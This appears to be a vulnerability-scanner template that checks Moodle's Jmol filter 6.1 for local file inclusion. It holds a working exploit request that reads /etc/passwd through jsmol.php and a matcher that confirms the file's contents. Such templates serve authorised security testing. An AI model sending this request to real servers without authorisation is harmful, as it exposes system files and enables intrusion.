id: moodle-filter-jmol-lfi

info:
  name: Moodle Jmol Filter 6.1 - Local File Inclusion
  author: madrobot
  severity: high
  description: Moodle is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/46881
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: moodle,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

# digest: 490a0046304402205db3303a2f85c57736c57b15894d9aa254b1332494f995fd18d897188273173002205e2785988a2cdc444baa7327ac49821b758a82308740e2965003b0adde5d3eee:922c64590222798bb761d5b6d8e72950
